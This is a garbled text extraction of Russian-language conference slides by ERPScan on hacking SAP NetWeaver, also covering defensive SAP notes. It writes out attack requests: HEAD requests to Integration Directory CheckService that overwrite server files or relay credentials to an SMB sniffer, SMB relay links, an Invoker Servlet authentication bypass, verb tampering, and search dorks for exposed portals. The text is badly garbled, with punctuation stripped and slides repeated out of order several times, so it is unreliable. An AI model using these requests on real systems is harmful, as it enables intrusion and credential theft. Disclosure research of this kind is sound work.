bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
